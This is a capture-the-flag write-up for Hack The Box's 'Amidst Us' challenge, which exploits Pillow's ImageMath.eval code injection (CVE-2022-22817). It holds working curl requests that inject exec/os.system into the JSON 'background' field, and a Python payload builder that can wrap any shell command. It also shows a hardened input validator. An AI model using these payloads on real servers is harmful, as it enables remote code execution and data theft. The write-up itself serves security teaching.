HackTheBox Amidst Us Challenge
Amidst Us is an easy-level web challenge on Hack The Box. It is a short introduction to code injection through a dependency: an image-processing API built on an outdated Pillow release lets user input reach Python's eval, and a single crafted request turns that into remote code execution and a flag read.
https://app.hackthebox.com/challenges/325
Description
The Amidst-Us tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and Bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?
Exploitation
The /api/alphafy endpoint accepts a JSON body with a base64-encoded PNG ("image") and a three-element "background" array, and the first background value ends up inside the expression string the application hands to Pillow's ImageMath.eval. In Pillow releases before 9.0.1 that expression is passed to Python's eval with the builtins still reachable (CVE-2022-22817), so any Python expression placed in background[0] runs on the server. Advisory:
https://security.snyk.io/vuln/SNYK-PYTHON-PILLOW-2331901
check
The first probe is a blind, timing-based one, so it needs no output from the server: the expression calls exec() to run sleep 5, and if the request takes roughly five seconds longer than a normal one the code executed. The image has to be a real PNG so the request reaches the image maths at all; on GNU coreutils use base64 -w0, because the default line wrapping would put raw newlines inside the JSON string and the parser would reject the body.
time curl 94.237.53.146:46950/api/alphafy -d '{"background":["exec(\"import os; os.system(\\\"sleep 5\\\")\")",255,255],"image":"'$(base64 challenge/application/static/images/arrow.png)'"}' -H 'Content-Type: application/json'
exploit
The expression is only needed for its side effect, so whether the image maths fails afterwards does not matter: exec() runs a shell command that copies /flag.txt into the application's static directory, which the web server serves without authentication. A 1x1 PNG is enough for the "image" field. Mind the three layers of quoting: inside the double-quoted shell string, \\\\' becomes \\' in the JSON text, which the JSON parser turns into \' inside the single-quoted Python string.
curl 94.237.53.146:46950/api/alphafy \
-H 'Content-Type: application/json' \
-d "{\"background\":[\"exec('import os;os.system(\\\\'cat /flag.txt > /app/application/static/flag.txt\\\\')')\",0,0],\"image\":\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==\"}"
The flag is then fetched as an ordinary static file:
curl 94.237.53.146:46950/static/flag.txt
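The script below is an added example, not code from the challenge or from this write-up. It models the two halves of the exploit offline: an ImageMath.eval-style evaluator that interpolates the first "background" value into an expression and feeds it to eval (a stand-in for Pillow before 9.0.1; the template string is an assumption, the challenge's real expression is not shown above), the hardened handling that coerces the channels to integers instead, and a payload builder that produces the /api/alphafy body with json.dumps rather than hand-escaped quotes. The flag file, the static directory and the flag value are constructed in a temporary directory.

```python
import base64
import builtins
import json
import os
import tempfile

# 1x1 PNG from the write-up's exploit request (constructed sample input).
TINY_PNG_B64 = ("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ"
                "AAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==")

# Hypothetical server-side template: stands in for the f-string the challenge
# hands to ImageMath.eval. Only the fact that background[0] is pasted in as
# text matters; the real expression differs.
TEMPLATE = "min(a, {red})"


def vulnerable_eval(template, background, env):
    """Model of ImageMath.eval before Pillow 9.0.1: the expression is built by
    text interpolation and evaluated with the normal builtins reachable, so any
    Python expression in background[0] runs with the server's privileges."""
    expression = template.format(red=background[0])
    return eval(expression, {"__builtins__": builtins}, dict(env))


def safe_background(background):
    """Hardened handling: three integer channels in 0..255, validated before
    use, so user input never becomes expression text."""
    if not isinstance(background, (list, tuple)) or len(background) != 3:
        raise ValueError("background must be three channel values")
    channels = []
    for value in background:
        # bool is a subclass of int; JSON true/false must not slip through.
        if isinstance(value, bool) or not isinstance(value, int):
            raise ValueError(f"channel must be an int, got {value!r}")
        if not 0 <= value <= 255:
            raise ValueError(f"channel out of range: {value}")
        channels.append(value)
    return tuple(channels)


def is_png(b64):
    """True if the base64 payload decodes to something with a PNG signature."""
    return base64.b64decode(b64).startswith(b"\x89PNG\r\n\x1a\n")


def build_payload(command, png_b64=TINY_PNG_B64):
    """Build the /api/alphafy body for a shell command. json.dumps handles the
    quoting the write-up escapes by hand in the curl command line."""
    expression = f'exec("import os;os.system({command!r})")'
    return json.dumps({"background": [expression, 0, 0], "image": png_b64})


def decode_payload(body):
    """Parse a request body back to a dict (what the server-side parser sees)."""
    return json.loads(body)


def simulate_exploit(flag_text="HTB{constructed_flag}"):
    """Offline re-run of the exploit step: the injected exec copies flag.txt into
    a 'static' directory the web server would expose. 'or 255' keeps the
    expression returning a usable number after the side effect has happened."""
    with tempfile.TemporaryDirectory() as tmp:
        flag = os.path.join(tmp, "flag.txt")
        static = os.path.join(tmp, "static")
        os.mkdir(static)
        with open(flag, "w") as fh:
            fh.write(flag_text)
        injected = (f'exec("import shutil;shutil.copy({flag!r}, {static!r})")'
                    " or 255")
        result = vulnerable_eval(TEMPLATE, [injected, 0, 0], {"a": 128})
        with open(os.path.join(static, "flag.txt")) as fh:
            return result, fh.read()


if __name__ == "__main__":
    print(simulate_exploit())          # (128, 'HTB{constructed_flag}')
    print(build_payload("sleep 5"))
    try:
        safe_background(["exec('x')", 255, 255])
    except ValueError as exc:
        print("hardened handler rejected it:", exc)
```

The vulnerable path returns a perfectly ordinary result (128) while the file copy has already happened, which is exactly why the write-up's timing probe is the right first check: the response body tells you nothing. The hardened handler fails closed on anything that is not an integer channel, which is the application-side fix to apply alongside upgrading Pillow.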
Summary
Amidst Us is an easy-level Hack The Box web challenge built around remote code execution in a Python API. The image-processing endpoint interpolates a user-supplied background value into an expression for Pillow's ImageMath.eval, and in Pillow releases before 9.0.1 (CVE-2022-22817) that expression is evaluated with Python's builtins reachable, so a crafted JSON body can call exec() and run arbitrary Python and shell commands on the server. The flag is read by copying it into the web root and fetching it as a static file. The lesson is twofold: never let untrusted input become expression text, and keep dependencies patched, because the injection here lives in a library call rather than in the application's own code.